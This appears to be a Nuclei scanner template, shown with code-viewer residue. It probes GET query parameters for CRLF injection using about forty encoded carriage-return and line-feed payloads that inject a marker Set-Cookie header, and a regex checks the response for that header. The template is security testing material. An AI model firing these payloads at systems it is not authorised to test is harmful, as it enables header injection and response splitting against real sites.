73 lines
1.6 KiB
YAML
73 lines
1.6 KiB
YAML
id: crlf-injection
|
|
|
|
info:
|
|
name: CRLF Injection
|
|
author: pdteam
|
|
severity: low
|
|
metadata:
|
|
max-request: 41
|
|
tags: crlf,dast
|
|
|
|
http:
|
|
- pre-condition:
|
|
- type: dsl
|
|
dsl:
|
|
- 'method == "GET"'
|
|
|
|
payloads:
|
|
escape:
|
|
- "%00"
|
|
- "%0a"
|
|
- "%0a%20"
|
|
- "%0d"
|
|
- "%0d%09"
|
|
- "%0d%0a"
|
|
- "%0d%0a%09"
|
|
- "%0d%0a%20"
|
|
- "%0d%20"
|
|
- "%20"
|
|
- "%20%0a"
|
|
- "%20%0d"
|
|
- "%20%0d%0a"
|
|
- "%23%0a"
|
|
- "%23%0a%20"
|
|
- "%23%0d"
|
|
- "%23%0d%0a"
|
|
- "%23%oa"
|
|
- "%25%30"
|
|
- "%25%30%61"
|
|
- "%2e%2e%2f%0d%0a"
|
|
- "%2f%2e%2e%0d%0a"
|
|
- "%2f..%0d%0a"
|
|
- "%3f"
|
|
- "%3f%0a"
|
|
- "%3f%0d"
|
|
- "%3f%0d%0a"
|
|
- "%e5%98%8a%e5%98%8d"
|
|
- "%e5%98%8a%e5%98%8d%0a"
|
|
- "%e5%98%8a%e5%98%8d%0d"
|
|
- "%e5%98%8a%e5%98%8d%0d%0a"
|
|
- "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
|
|
- "%u0000"
|
|
- "%u000a"
|
|
- "%u000d"
|
|
- "\r"
|
|
- "\r%20"
|
|
- "\r\n"
|
|
- "\r\n%20"
|
|
- "\r\n\t"
|
|
- "\r\t"
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: postfix
|
|
fuzz:
|
|
- "{{escape}}Set-Cookie:crlfinjection=crlfinjection"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
|
|
# digest: 4a0a00473045022000c5e1faa6655bbb3adcbba890473900bb1a7ea522bbee7684da04fcd58ad613022100c3dffcd18d8133aebdad962d7013490ca3e90c50a0cfdf684c5ac54ab0ad2e34:922c64590222798bb761d5b6d8e72950 |